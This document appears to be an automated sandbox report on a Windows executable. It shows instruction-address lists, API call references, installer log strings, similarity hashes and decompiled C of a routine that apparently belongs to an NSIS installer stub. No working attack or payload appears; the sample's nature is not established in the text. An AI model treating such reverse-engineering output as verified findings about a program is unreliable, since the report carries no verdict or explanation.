0x00401f8e
0x00401f93
0x00401f97
0x00401f9a
0x00401fa3
0x00401fa3
0x00401fa6
0x00401faa
0x00401fb3
0x00401fb3
0x00401fb6
0x00401fba
0x0040200f
0x00402011
0x00402019
0x0040201b
0x0040201d
0x00402022
0x00402025
0x00402027
0x00402027
0x00402030
0x00000000
0x00401fbc
0x00401fbc
0x00401fbe
0x00401fbf
0x00401fc4
0x00401fc6
0x00401fc7
0x00401fc9
0x00401fce
0x00401fd1
0x00401fd4
0x00401fd6
0x00401ffe
0x00402036
0x00402036
0x00402039
0x00402039
0x0040203c
0x00000000
0x00000000
0x00402042
0x00000000
0x00402042
0x00401fd8
0x00401fe6
0x00401fec
0x00401fee
0x00401ff1
0x00000000
0x00401ff1
0x00000000
0x0040204a
0x0040204c
0x00402052
0x00402058
0x0040205a
0x004018d3
0x004018d3
0x00000000
0x004018d3
0x004018ba
0x004018ba
0x00000000
0x00000000
0x00402065
0x00402067
0x00402068
0x0040206d
0x00402070
0x00402071
0x00402077
0x00000000
0x00000000
0x00402087
0x0040208c
0x00402094
0x00000000
0x00000000
0x004020a9
0x004020b0
0x004020b9
0x004020c3
0x004020ca
0x004020d1
0x004020df
0x004020e5
0x004020e7
0x004020ee
0x004020ee
0x00000000
0x00000000
0x004020f9
0x00402100
0x0040210d
0x0040210e
0x00402110
0x00402111
0x00402117
0x0040211d
0x0040211f
0x00402121
0x00402122
0x0040212f
0x00402134
0x00402139
0x0040213c
0x00402142
0x00402144
0x00402147
0x0040214e
0x00402154
0x00402159
0x00402160
0x0040216a
0x00000000
0x00000000
0x00402175
0x00402177
0x0040217c
0x0040217e
0x0040217f
0x00402186
0x00402188
0x0040218b
0x0040218d
0x00402192
0x00402197
0x00402197
0x00402198
0x00402199
0x0040219a
0x0040219d
0x004021aa
0x0040219f
0x0040219f
0x0040219f
0x00000000
0x00000000
0x004021bd
0x004021c6
0x004021cf
0x004021dd
0x004021e8
0x004021ea
0x004021f4
0x004021f7
0x004021f9
0x004021fc
0x00402202
0x00402208
0x0040220b
0x00402223
0x00402224
0x0040222b
0x00000000
0x00402230
0x0040220d
0x0040220e
0x0040220f
0x00402216
0x00000000
0x00000000
0x0040223e
0x00402246
0x0040224b
0x0040224c
0x00402250
0x00402256
0x0040225b
0x0040225e
0x0040225f
0x00402261
0x004022c2
0x00401950
0x00401950
0x00000000
0x00401950
0x00402263
0x00402268
0x0040226d
0x0040226e
0x0040226f
0x00402272
0x004022ba
0x004022ba
0x00000000
0x004022ba
0x00402274
0x00402283
0x00402288
0x0040228a
0x0040228f
0x00000000
0x00000000
0x0040227e
0x0040227e
0x00402298
0x0040229e
0x004022a1
0x004022ae
0x004022b1
0x004022b3
0x004022b3
0x004022a3
0x004022a7
0x004022a7
0x00000000
0x00000000
0x004022ce
0x004022d4
0x004022d9
0x004022db
0x004022f0
0x004022f2
0x004022f5
0x00000000
0x004022f5
0x004022dd
0x004022e3
0x004022e8
0x00000000
0x00000000
0x004022ff
0x00402304
0x00402309
0x0040230c
0x00402311
0x00402313
0x00402316
0x00402319
0x0040231c
0x00402323
0x00402325
0x00000000
0x00000000
0x0040232e
0x00402334
0x00402337
0x00402339
0x00000000
0x00000000
0x00402347
0x0040234c
0x0040234e
0x00402354
0x00402360
0x00402365
0x00402367
0x00402370
0x0040237c
0x00402381
0x00402381
0x00402367
0x00000000
0x00000000
0x0040239e
0x004023a2
0x004023aa
0x004023ac
0x004023ae
0x004023ae
0x004023b5
0x004023b6
0x004023b7
0x00000000
0x00000000
0x004023cd
0x004023d1
0x004023d9
0x004023db
0x004023dd
0x004023dd
0x004023e4
0x004023e5
0x004023e6
0x00000000
0x00000000
0x004023f0
0x004023f7
0x004023fd
0x004024ec
0x004024f1
0x004017a6
0x004017a6
0x00000000
0x004017a6
0x0040240c
0x00402413
0x00402416
0x00402419
0x00402429
0x0040242d
0x00402433
0x00402436
0x00402438
0x004024d5
0x004024da
0x004024db
0x00000000
0x004024db
0x0040243e
0x00402449
0x0040244b
0x0040244d
0x00402491
0x00402496
0x0040249f
0x0040244f
0x0040244f
0x00402452
0x00402455
0x0040246e
0x00402473
0x00402478
0x0040247d
0x00402482
0x00402485
0x00402487
0x00402457
0x0040245a
0x0040245f
0x00402461
0x00402463
0x00402465
0x00402465
0x00402463
0x00402455
0x004024a7
0x004024aa
0x004024b3
0x004024b8
0x004024ba
0x004024c3
0x004024c3
0x004024ba
0x00000000
0x004024aa
0x0040241c
0x00402422
0x00402425
0x00402427
0x00000000
0x00000000
0x00000000
0x00000000
0x00402504
0x0040250e
0x00402517
0x00402521
0x0040252a
0x0040252d
0x00402532
0x00402534
0x00402538
0x00402538
0x0040253d
0x00402542
0x00402545
0x00402548
0x0040254b
0x00402550
0x00402552
0x00402555
0x00402556
0x00402559
0x0040255c
0x00402565
0x0040256d
0x00402570
0x00402571
0x00402576
0x00402578
0x00402579
0x0040257e
0x00402584
0x00402586
0x00402646
0x00402646
0x0040264b
0x00402652
0x00000000
0x0040258c
0x0040258c
0x0040258f
0x00402591
0x00402594
0x00402595
0x0040259a
0x0040259b
0x0040259d
0x004025a0
0x004025a2
0x004025a8
0x004025ab
0x004025ad
0x004025ae
0x004025b2
0x004025b5
0x004025b8
0x004025ba
0x004025bf
0x004025c0
0x004025c3
0x004025c8
0x004025cb
0x004025cb
0x004025cd
0x004025cf
0x004025d2
0x004025d4
0x004025d5
0x004025d6
0x004025d9
0x004025d9
0x004025dc
0x004025df
0x004025e4
0x004025e5
0x004025e6
0x004025e9
0x004025ec
0x004025ef
0x004025f1
0x004025f4
0x004025f7
0x004025f9
0x004025f9
0x004025fb
0x004025fc
0x004025fd
0x004025fe
0x004025fe
0x00402601
0x00402604
0x00402607
0x00402609
0x0040260a
0x0040260d
0x00402610
0x00402613
0x00402615
0x00402616
0x00402619
0x0040261c
0x0040261e
0x00402621
0x00402623
0x00402625
0x00402628
0x0040262c
0x0040262c
0x0040262f
0x00402632
0x00402634
0x00402635
0x00402635
0x00402638
0x0040263b
0x0040263d
0x0040263e
0x00402641
0x00402644
0x00402659
0x0040265e
0x00401689
0x00401689
0x00000000
0x00000000
0x00000000
0x00000000
0x00402644
0x00000000
0x0040266d
0x00402676
0x00402678
0x0040267d
0x00402684
0x00402687
0x00402690
0x00402695
0x00402697
0x004026a6
0x004026aa
0x004026ad
0x004026b4
0x004026b9
0x004026bc
0x004026c1
0x004026c6
0x004026c8
0x004026cd
0x004026d0
0x004026d6
0x004026d9
0x004026dc
0x004026df
0x004026e8
0x004026ec
0x004026f2
0x004026f4
0x00000000
0x00000000
0x004026fa
0x0040269c
0x00000000
0x00000000
0x004026fc
0x00402702
0x00401ee4
0x00401ee4
0x00401ef1
0x00401c3c
0x00401c3c
0x00401632
0x00401632
0x00000000
0x00401632
0x00402708
0x00000000
0x00000000
0x00402718
0x0040271e
0x00402721
0x00402724
0x00402727
0x0040272d
0x00402733
0x00402738
0x0040273b
0x00402743
0x00402743
0x00402746
0x00402749
0x00402752
0x00402752
0x00402755
0x00402758
0x00402761
0x00402761
0x0040276b
0x0040276d
0x0040276e
0x0040276f
0x0040277a
0x0040278c
0x00000000
0x00000000
0x00402797
0x0040279c
0x0040279f
0x004027a6
0x004027b0
0x004027b9
0x004027c7
0x004027d3
0x004027d8
0x004019e4
0x004019e4
0x004019e6
0x00000000
0x00000000
0x00000000
0x00000000
0x004027ea
0x004027ed
0x004027f0
0x00402838
0x0040283d
0x0040283f
0x00402848
0x0040284d
0x00402853
0x00402855
0x0040285c
0x0040285c
0x0040285c
0x00402864
0x00402864
0x0040286f
0x00402872
0x00402872
0x00402875
0x00000000
0x00000000
0x00000000
0x0040287b
0x004027f9
0x004027fb
0x004027fd
0x00000000
0x00000000
0x0040280a
0x0040280e
0x00402814
0x00402815
0x0040281d
0x0040282e
0x00000000
0x00000000
0x00402880
0x00402882
0x00402888
0x0040288e
0x0040288e
0x00402884
0x00402884
0x00402884
0x00402894
0x00402897
0x0040289a
0x0040289f
0x004028a9
0x004028b2
0x004028bc
0x004028c3
0x004028c9
0x004028d5
0x004028d7
0x004028da
0x004028e0
0x004028e2
0x004029ef
0x004029f2
0x004029f5
0x00401b86
0x00401b86
0x00401b8b
0x00401b8b
0x00000000
0x004028e8
0x004028e8
0x004028eb
0x004028f0
0x004028f3
0x00402937
0x00402937
0x00402939
0x0040293a
0x0040293d
0x0040293f
0x00402941
0x00402942
0x00402947
0x00402948
0x0040294b
0x00402950
0x00402953
0x0040295e
0x00402963
0x00402966
0x0040296a
0x0040297d
0x0040298c
0x00402991
0x00402997
0x00402998
0x0040299b
0x004029a6
0x004029ab
0x004029ae
0x004029bc
0x004029c2
0x004029c4
0x004029cb
0x004029ce
0x004029d9
0x004029c6
0x004029c6
0x004029c6
0x004029e1
0x00000000
0x004029e1
0x004028f7
0x004028fd
0x00402902
0x00402903
0x00402906
0x0040290a
0x0040290d
0x00402910
0x00402913
0x00402916
0x0040292a
0x0040292f
0x00402934
0x00000000
0x00402934
0x00402918
0x0040291d
0x00402922
0x00000000
0x00402922
0x00000000
0x00402a0b
0x00402a0d
0x00402a12
0x00402a14
0x00402a17
0x00402a19
0x00000000
0x00000000
0x00402a24
0x00402a2b
0x00402a32
0x00402a38
0x00402a3a
0x00402a3b
0x00402a3d
0x00402a76
0x00402a76
0x00402a76
0x00402a78
0x00402a7b
0x00000000
0x00402a7b
0x00402a3f
0x00402a43
0x00402a63
0x00402a65
0x00402a69
0x00402a6c
0x00402a6f
0x00000000
0x00402a6f
0x00402a45
0x00402a48
0x00402a50
0x00402a50
0x00402a53
0x00402a56
0x00402a59
0x00402a5b
0x00000000
0x00402a5b
0x00402a4a
0x00402a4e
0x00000000
0x00000000
0x00000000
0x00000000
0x00402a89
0x00402a8e
0x00402a90
0x00402a91
0x00402a93
0x00402a98
0x00402a9a
0x00402a9d
0x00402a9f
0x00000000
0x00000000
0x00402aa5
0x00402aaa
0x00402aad
0x00402ab0
0x00402ac2
0x00402ac9
0x00402acf
0x00402ad1
0x00000000
0x00000000
0x00402ad7
0x00402ad7
0x00402ad9
0x00402a7e
0x00402a7e
0x004029e4
0x004029e4
0x00000000
0x004029e4
0x00402ab6
0x00000000
0x00000000
0x00402ae2
0x00402ae4
0x00402ae5
0x00402af1
0x00402af2
0x00402af2
0x00402af2
0x00000000
0x00000000
0x00402aff
0x00402b0b
0x00402b10
0x00402b13
0x00000000
0x00000000
0x00000000
0x00000000
0x00402b23
0x00402b31
0x00402b34
0x00402b37
0x00402b61
0x00402b6a
0x00402b39
0x00402b39
0x00402b3b
0x00402b3c
0x00402b41
0x00402b44
0x00402b48
0x00402b48
0x00402b70
0x00402b73
0x00402b93
0x00402b93
0x00000000
0x00402b75
0x00402b76
0x00402b7f
0x00402b85
0x00402b8b
0x00402b8d
0x00402384
0x00402384
0x00402387
0x00402387
0x00000000
0x00402387
0x00000000
0x00402b8d
0x00000000
0x00402b9f
0x00402ba1
0x00402ba2
0x00402ba7
0x00402baa
0x00402bad
0x00000000
0x00000000
0x00402bb3
0x00402bb8
0x00402bba
0x00402bbc
0x00402bbc
0x00402bbf
0x00402bc2
0x00000000
0x00402bc8
0x00402bc9
0x00402bd1
0x00402bd4
0x00402bd7
0x00000000
0x00000000
0x00402bdd
0x00402bdf
0x00402be6
0x00402bed
0x00402bf3
0x00402bf5
0x00000000
0x00000000
0x00402bfb
0x00402bff
0x00000000
0x00000000
0x00402c01
0x00402c04
0x00402c3f
0x00000000
0x00402c3f
0x00402c0e
0x00402c14
0x00402c1a
0x00402c1d
0x00402c1f
0x00402c4f
0x00402c4f
0x00402c52
0x00402c6b
0x00402c6b
0x00402c6d
0x00402c6e
0x00000000
0x00402c6e
0x00402c54
0x00402c58
0x00402c60
0x00402c60
0x00000000
0x00402c60
0x00402c5a
0x00402c5e
0x00000000
0x00000000
0x00000000
0x00402c5e
0x00402c21
0x00402c23
0x00000000
0x00000000
0x00402c25
0x00402c29
0x00402c2d
0x00402c30
0x00402c31
0x00402c34
0x00402c36
0x00000000
0x00000000
0x00402c38
0x00402c3b
0x00000000
0x00000000
0x00000000
0x00402c3d
0x00000000
0x00402bdf
0x00000000
0x00402c8a
0x00402c8d
0x00402ca4
0x00402caa
0x00402c8f
0x00402c8f
0x00402c91
0x00402c92
0x00402c97
0x00402c9d
0x00402c9f
0x00402c9f
0x00402caf
0x00402cb2
0x00000000
0x00402cb8
0x00402cb9
0x00402cbd
0x00402cc6
0x00402ccc
0x00401a0b
0x00401a0b
0x00000000
0x00401a0b
0x00000000
0x00402cd7
0x00402cd9
0x00402cda
0x00402cdf
0x00402ce2
0x00402ce5
0x00000000
0x00000000
0x00402ceb
0x00402cf0
0x00402cf2
0x00402cf4
0x00402cf4
0x00402cf7
0x00402cfa
0x00402c7b
0x00402c7b
0x00000000
0x00402d00
0x00402d01
0x00402d09
0x00402d0c
0x00402d0f
0x00000000
0x00000000
0x00402d15
0x00402d17
0x00402d1e
0x00402d25
0x00402d2b
0x00402d2d
0x00000000
0x00000000
0x00402d33
0x00402d37
0x00000000
0x00000000
0x00402d3d
0x00402d40
0x00402d72
0x00402c43
0x00402c45
0x00000000
0x00402c45
0x00402d42
0x00402d47
0x00402d7b
0x00402d7b
0x00402d7f
0x00402d83
0x00402d99
0x00402d99
0x00402d9b
0x00402d9c
0x00402c70
0x00402c73
0x00000000
0x00402c73
0x00402d85
0x00402d89
0x00402c64
0x00402c64
0x00402c68
0x00000000
0x00402c68
0x00402d8f
0x00402d93
0x00000000
0x00000000
0x00000000
0x00402d93
0x00402d49
0x00402d4e
0x00000000
0x00000000
0x00402d50
0x00402d54
0x00402d57
0x00402d5b
0x00402d5c
0x00402d5f
0x00402d62
0x00000000
0x00000000
0x00402d68
0x00402d6b
0x00000000
0x00000000
0x00000000
0x00402d6d
0x00402c7d
0x00402c7d
0x00402c7f
0x00402c83
0x00401a0d
0x00401a0d
0x00000000
0x00000000
0x00000000
0x00401a0d
0x00000000
0x00402da3
0x00402da5
0x00402da6
0x00000000
0x00402dac
0x00402dac
0x00402daf
0x00402db0
0x00402db2
0x00402db3
0x00402dba
0x00402dc0
0x00402dc6
0x00402dc9
0x00000000
0x00000000
0x00000000
0x00402dc9
0x00000000
0x00402dd6
0x00402dd8
0x00402dd9
0x00402de6
0x00402de6
0x00000000
0x00000000
0x00402df1
0x00402df4
0x004019ec
0x004019ec
0x004019ee
0x004019f5
0x00000000
0x004019f5
0x00402dfa
0x00402e02
0x00402e08
0x00402e0e
0x00402e10
0x00000000
0x00000000
0x00000000
0x00000000
0x00402e1a
0x00402e1f
0x00402e27
0x00402e2d
0x00402e30
0x00402e3e
0x00402e43
0x00402e43
0x00402e49
0x00402e4a
0x00000000
0x00402e4a
0x00402e32
0x00402e34
0x00402b19
0x00402b19
0x00402b1b
0x00000000
0x00000000
0x00402e57
0x00402e5e
0x00402e63
0x00402e66
0x00402e69
0x00402e6e
0x00402e70
0x00402e74
0x00402e74
0x00402e7a
0x00402e87
0x00402e8c
0x00402e8f
0x00402e92
0x00402f35
0x00402f35
0x00402f40
0x00402f48
0x00402f4a
0x00402f4b
0x00402f4e
0x00402f50
0x00402f52
0x00402f56
0x00402f5c
0x00402f5c
0x00402f64
0x00000000
0x00402e98
0x00402e98
0x00402e9d
0x00402ea6
0x00402eab
0x00402ead
0x00402eaf
0x00402f2c
0x00402f2f
0x00000000
0x00402f2f
0x00402ebb
0x00402ec7
0x00402ec9
0x00402ecc
0x00402ece
0x00402f04
0x00402f10
0x00402f17
0x00402f29
0x00000000
0x00402f29
0x00402ed8
0x00402ef7
0x00402ef7
0x00402ef9
0x00000000
0x00000000
0x00402edf
0x00402ee1
0x00402ee5
0x00402ee9
0x00402eec
0x00402eef
0x00402ef4
0x00402ef4
0x00402ef4
0x00402efe
0x00000000
0x00402efe
0x00000000
0x00402f6e
0x00402f70
0x00402fb5
0x00402fb6
0x00401957
0x00401957
0x0040195c
0x004017ab
0x004017ab
0x00000000
0x004017ab
0x00402f7d
0x00402f86
0x00402f8b
0x00402f93
0x00402f96
0x00402fa4
0x00402f98
0x00402f98
0x00402f98
0x00000000
0x00000000
0x00402fc0
0x00402fc2
0x00402fc7
0x00402fca
0x00402fd0
0x00000000
0x00000000
0x00402fd6
0x00402fd8
0x00402fdb
0x00402fe1
0x00402fe7
0x00402fe9
0x00403003
0x00403003
0x00403005
0x00403008
0x0040301a
0x0040301e
0x00403023
0x00403023
0x00403023
0x0040300a
0x0040300a
0x0040300c
0x00403012
0x00403012
0x0040302a
0x0040302d
0x00403030
0x00403033
0x00403036
0x0040303f
0x0040303f
0x00000000
0x00403036
0x00402feb
0x00402fee
0x00402ffa
0x00000000
0x00402ffa
0x00402ff3
0x00402ff4
0x00402e4b
0x00402e4b
0x00000000
0x00000000
0x00403049
0x0040304b
0x00403050
0x00403053
0x00401a13
0x00401a13
0x00000000
0x00401a13
0x00403059
0x0040305c
0x0040307d
0x00403080
0x00403094
0x004030a2
0x00403082
0x00403082
0x00403085
0x0040308b
0x0040308b
0x00000000
0x00403080
0x0040305e
0x00403061
0x00403073
0x00402dcf
0x00402dcf
0x00402dd0
0x00402dd0
0x00000000
0x00402dd0
0x0040306b
0x00000000
0x00000000
0x00000000
0x00000000
0x004030af
0x004030b7
0x004030bd
0x004030c0
0x004030c7
0x004030c7
0x00000000
0x00000000
0x004030d1
0x004030d7
0x004030dc
0x004030dc
0x004030dd
0x004030dd
0x004030de
0x004030de
0x00000000
0x00000000

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32 ref: 004019BF
SearchPathW.KERNEL32(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

CreateDirectory: "%s" created, xrefs: 00401849
CreateDirectory: "%s" (%d), xrefs: 004017BF
Jump: %d, xrefs: 00401602
IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
Call: %d, xrefs: 0040165A
SetFileAttributes failed., xrefs: 004017A1
BringToFront, xrefs: 004016BD
Rename on reboot: %s, xrefs: 00401943
Aborting: "%s", xrefs: 0040161D
IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
SetFileAttributes: "%s":%08X, xrefs: 0040177B
CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
Rename failed: %s, xrefs: 0040194B
Sleep(%d), xrefs: 0040169D
detailprint: %s, xrefs: 00401679
Rename: %s, xrefs: 004018F8

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: a2971be56c0cfd47d5307d7f7768ca3f7fa57c8f462c4874fa5e107da44034ff
Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
Opcode Fuzzy Hash: a2971be56c0cfd47d5307d7f7768ca3f7fa57c8f462c4874fa5e107da44034ff
Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

Uniqueness

Uniqueness Score: -1.00%

Function 00405958, Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00405958(signed int __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				intOrPtr _v20;
				short _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t28;
				short _t29;
				short _t30;
				void* _t39;
				void* _t41;
				int _t42;
				void* _t45;
				struct HINSTANCE__* _t48;
				int _t49;
				int _t53;
				short _t75;
				WCHAR* _t77;
				signed char _t81;
				short* _t83;
				short _t90;
				intOrPtr _t91;
				WCHAR* _t94;
				intOrPtr _t96;
				WCHAR* _t101;

				_t89 = __ecx;
				_t96 =  *0x47eabc;
				_t28 = E00406328(6);
				_t103 = _t28;
				if(_t28 == 0) {
					_t29 = 0x30;
					 *0x4df0c0 = _t29;
					_t30 = 0x78;
					_t94 = 0x451d98;
					 *0x4df0c2 = _t30;
					 *0x4df0c4 = 0;
					E00405EFF(0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x451d98, 0);
					__eflags =  *0x451d98;
					if(__eflags == 0) {
						E00405EFF(0x80000003, L".DEFAULT\\Control Panel\\International",  &M0040A4A4, 0x451d98, 0);
					}
					lstrcatW(0x4df0c0, _t94);
				} else {
					E00405F7D(0x4df0c0,  *_t28() & 0x0000ffff);
				}
				E00403EC1(_t89, _t103);
				 *0x47eb60 =  *0x47eb08 & 0x00000020;
				 *0x47eb7c = 0x10000;
				if(E004067AA(_t103, 0x4d30a8) != 0) {
					L16:
					if(E004067AA(_t112, 0x4d30a8) == 0) {
						E00406831(0, _t94, _t96, 0x4d30a8,  *((intOrPtr*)(_t96 + 0x118)));
					}
					if(( *0x47eb08 & 0x00000010) != 0 &&  *0x47eb04 == 0) {
						E00403EA0();
						 *0x46d204 = 1;
					}
					_t39 = LoadImageW( *0x47eab8, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x476a70 = _t39;
					if( *((intOrPtr*)(_t96 + 0x50)) == 0xffffffff) {
						L24:
						if(E0040141D(0) == 0) {
							_t41 = E00403EC1(_t89, __eflags);
							__eflags =  *0x47eb80;
							if( *0x47eb80 != 0) {
								_t42 = E00405073(_t41, 0);
								__eflags = _t42;
								if(_t42 == 0) {
									E0040141D(1);
									goto L36;
								}
								__eflags =  *0x476a74;
								if( *0x476a74 == 0) {
									E0040141D(2);
								}
								goto L25;
							}
							ShowWindow( *0x441d70, 5);
							_t48 = LoadLibraryW(L"RichEd20");
							__eflags = _t48;
							if(_t48 == 0) {
								LoadLibraryW(L"RichEd32");
							}
							_t101 = L"RichEdit20A";
							_t49 = GetClassInfoW(0, _t101, 0x476a40);
							__eflags = _t49;
							if(_t49 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x476a40);
								 *0x476a64 = _t101;
								RegisterClassW(0x476a40);
							}
							_t53 = DialogBoxParamW( *0x47eab8,  *0x476a7c + 0x00000069 & 0x0000ffff, 0, E004054A5, 0);
							E00403C94(E0040141D(5), 1);
							return _t53;
						}
						L25:
						_t45 = 2;
						return _t45;
					} else {
						_t90 =  *L"_Nb"; // 0x4e005f
						_v24 = _t90;
						_t91 =  *0x40a404; // 0x62
						_v20 = _t91;
						_t89 =  *0x47eab8;
						 *0x476a54 = _t39;
						 *0x476a44 = E00401000;
						 *0x476a50 =  *0x47eab8;
						 *0x476a64 =  &_v24;
						if(RegisterClassW(0x476a40) == 0) {
							L36:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x441d70 = CreateWindowExW(0x80,  &_v24, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x47eab8, 0);
						goto L24;
					}
				} else {
					_t89 =  *(_t96 + 0x48);
					if( *(_t96 + 0x48) == 0) {
						goto L16;
					}
					_t94 = 0x46e220;
					E00405EFF( *((intOrPtr*)(_t96 + 0x44)),  *0x47ead8 + _t89 * 2,  *0x47ead8 +  *(_t96 + 0x4c) * 2, 0x46e220, 0);
					_t75 =  *0x46e220;
					if(_t75 == 0) {
						goto L16;
					}
					if(_t75 == 0x22) {
						_t94 = 0x46e222;
						_t83 = E00405D32(0x46e222, 0x22);
						_t89 = 0;
						 *_t83 = 0;
					}
					_t9 = lstrlenW(_t94) * 2; // 0x46e21a
					_t77 = _t94 + _t9 - 8;
					if(_t77 <= _t94 || lstrcmpiW(_t77, L".exe") != 0) {
						L15:
						E00406035(0x4d30a8, E0040674E(_t94));
						goto L16;
					} else {
						_t81 = GetFileAttributesW(_t94);
						if(_t81 == 0xffffffff) {
							L14:
							E0040677D(_t94);
							goto L15;
						}
						_t112 = _t81 & 0x00000010;
						if((_t81 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00405958
0x0040595e
0x00405967
0x0040596e
0x00405970
0x00405986
0x00405989
0x0040598f
0x00405991
0x00405998
0x004059aa
0x004059b0
0x004059b5
0x004059bc
0x004059cf
0x004059cf
0x004059da
0x00405972
0x0040597d
0x0040597d
0x004059df
0x004059f2
0x004059f7
0x00405a08
0x00405a9c
0x00405aa4
0x00405aad
0x00405aad
0x00405ab9
0x00405ac3
0x00405ac8
0x00405ac8
0x00405ae3
0x00405ae9
0x00405af7
0x00405b92
0x00405b9a
0x00405ba4
0x00405ba9
0x00405baf
0x00405c39
0x00405c3e
0x00405c40
0x00405c5c
0x00000000
0x00405c5c
0x00405c42
0x00405c48
0x00405c50
0x00405c50
0x00000000
0x00405c48
0x00405bbd
0x00405bce
0x00405bd0
0x00405bd2
0x00405bd9
0x00405bd9
0x00405be2
0x00405be9
0x00405beb
0x00405bed
0x00405bf6
0x00405bf9
0x00405bff
0x00405bff
0x00405c1e
0x00405c2f
0x00000000
0x00405c34
0x00405b9c
0x00405b9e
0x00000000
0x00405afd
0x00405afd
0x00405b03
0x00405b07
0x00405b0d
0x00405b11
0x00405b17
0x00405b21
0x00405b2b
0x00405b31
0x00405b3f
0x00405c61
0x00405c61
0x00000000
0x00405c61
0x00405b4e
0x00405b8d
0x00000000
0x00405b8d
0x00405a0e
0x00405a0e
0x00405a13
0x00000000
0x00000000
0x00405a22
0x00405a33
0x00405a38
0x00405a41
0x00000000
0x00000000
0x00405a47
0x00405a4b
0x00405a51
0x00405a56
0x00405a58
0x00405a58
0x00405a61
0x00405a61
0x00405a67
0x00405a8f
0x00405a97
0x00000000
0x00405a79
0x00405a7a
0x00405a83
0x00405a89
0x00405a8a
0x00000000
0x00405a8a
0x00405a85
0x00405a87
0x00000000
0x00000000
0x00000000
0x00405a87
0x00405a67

APIs

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

lstrcatW.KERNEL32(004DF0C0,00451D98), ref: 004059DA
lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

LoadImageW.USER32 ref: 00405AE3
RegisterClassW.USER32 ref: 00405B36
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
CreateWindowExW.USER32 ref: 00405B87

Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C

ShowWindow.USER32(00000005,00000000), ref: 00405BBD
LoadLibraryW.KERNEL32(RichEd20), ref: 00405BCE
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
GetClassInfoW.USER32 ref: 00405BE9
GetClassInfoW.USER32 ref: 00405BF6
RegisterClassW.USER32 ref: 00405BFF
DialogBoxParamW.USER32 ref: 00405C1E

Strings

RichEdit20A, xrefs: 00405BE2, 00405BE7
@jG, xrefs: 00405AF2
.exe, xrefs: 00405A69
RichEdit, xrefs: 00405BF0
Control Panel\Desktop\ResourceLocale, xrefs: 0040599E
